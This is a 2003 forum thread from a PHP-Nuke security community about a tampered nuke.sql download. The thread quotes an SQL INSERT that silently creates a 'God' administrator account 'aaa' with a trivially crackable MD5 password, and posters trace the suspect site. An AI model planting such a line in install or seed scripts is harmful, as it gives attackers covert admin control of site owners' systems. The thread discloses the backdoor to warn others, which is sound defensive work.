Alert - Altered nuke.sql file being circulated gives admin

Nuke Soldier Joined: Jul 17, 2003 Posts: 19

I downloaded a copy of nuke 6.8 on monday, after installing it on my site and loading the database I was unable to create an admin account. A very nice nukecop staff member offered to debug it and found that I had already created an account name aaa. Now this happened on 2 other databases that I loaded and I know I didn't create an account by accident 3 times, so I checked the other DB's and found they too had a GOD account created as aaa. Now, I decided to act on a hunch and search the nuke.sql for aaa.

I found this:

Code:

INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '');

I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.

So all I can say is be very careful where you get your downloads and be aware that this is in circulation.

Posted: Sun Jul 20, 2003 5:53 pm

Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

General Joined: Mar 22, 2003 Posts: 5233 Location: USA

Interesting turn of events, isn't it. The question is hotly debated as to what $10 will buy you. Hmmm.

Lieutenant Joined: May 29, 2003 Posts: 231

chatserv wrote:

Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

Even then you have to be on your guard. I came across one of the established Nuke sites advertising a hacker's security fix on their front page which you all caught as bogus. I had to tell them to remove it. I won't post which one it was, but I'll say many sites just don't check things out.

Lieutenant Joined: Apr 09, 2003 Posts: 188

iD LIKE by first Job..(site almost ready,waiting mikem answer ) Get NUKE REPORT into the patrol of (unficial) Nuke Sites.

and my sugestion its,why the nuke files can be only autorized to be downloaded from official nuke sites
like nuke cops,phpnuke ,we can created a standart image,sayng that its a secure web site...
what u think?

Support Mod Joined: Mar 19, 2003 Posts: 308

I allready had a phpnuke 6.7 version and in the sql-file they had added a link to their website so you would get:

Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license

URL of that website

Be carefull what you download! I think it can be easy to install something on it to track your website etc...

Posted: Mon Jul 21, 2003 3:09 am

Hello,

Quoting the Security Alert Message on the mainpage

Quote:

He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.

Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?

Lieutenant Joined: May 29, 2003 Posts: 231

Quote:

Did I miss something here?

Apparently so. The FAQ is a word-for-word rip off from the main site. Like you I don't see any link for downloading, but it could have been changed or maybe the wrong URL was posted.

Anyway, this is the registration of the site you think is legit looking. Missing a few details wouldn't you say?

WhoIs Results for nukephp.org

Contact Type Registrant
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Administrative
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Billing
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Technical
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Other Information
created-by: 5065-EN
created-date:
nameserver: dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

registrar: 5065-EN
registration-expiration-date:
status:
updated-by: 5065-EN
updated-date:

General Joined: Mar 22, 2003 Posts: 5233 Location: USA

foxyfemfem wrote:

Hello,

Quoting the Security Alert Message on the mainpage

Quote:

He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.

Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?

You cannot download v6.8 from phpnuke.org without being a member of the Club, so he did not d/l it from there.

Nuke Soldier Joined: Jul 17, 2003 Posts: 19

As I said above:

Quote:

I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.

I want to say that I did get it from a link off of nukephp.org but I can not be sure, I thought I did. The link said that it required no registration also.

When I get home from work, I will see if there is anything else I can do to see where I got the download.

Nuke Cops Founder Joined: Nov 14, 2002 Posts: 5939

Running analzyer will show you who the admins are of php-nuke and the phpbb2 forums. You can, as I often do, run it for a quick visual check of any changes.

Sergeant Joined: Jun 22, 2003 Posts: 140 Location: USA

Where do you get the analyzer from?

Nuke Cops Founder Joined: Nov 14, 2002 Posts: 5939

Hi, right on our front page.

Sergeant Joined: Jun 22, 2003 Posts: 140 Location: USA

Thank you.

Sergeant Joined: Jun 22, 2003 Posts: 140 Location: USA

Ok, I got warnings big time, I was able to fix alot of them simply. but this is the part that I am not sure about.

I got this
-------
WARNING! WARNING! WARNING! Vulnerable PHP On Your Server!
PHP Version Reason For Vulnerability
4.3.1 Your Server may be vulnerable to Cross-site Scripting in PHP's Transparent Session ID Support. Versions prior to 4.3.2 are affected. Tell your host to read the SecurityFocus report by clicking --> here. Until that is resolved, PHP-Nuke should be the least of your worries.

AFFECTED VERSIONS: Constraints
4.3.0 and 4.3.1 with php.ini containing session.use_trans_sid=1
4.2.0 to 4.2.3 without php.ini, or with php.ini containing session.use_trans_sid=1(php.ini-dist and php.ini-recommended from the PHP source distribution had use_trans_sid=1 from 4.2.0 to 4.2.2, and use_trans_sid=0 for 4.2.3 and later versions.)
prior to 4.2.0 compiled with --enable-trans-sid and with session.use_trans_sid=1

FIXED VERSIONS: Suggestion
4.3.2 or later Backup your system and upgrade PHP, also read the article at SecurityFocus. Solution 1 from Security Focus: Click, Solution 2 from thathost: Click. Solution 1 suggests the use of mod_security, which is an Apache module discussed at Nuke Cops: Here

Does this meant that this will be resolved if I update to nule 4.3.2?
How do I tell what version that I am on. I am using PHPNuke 6.7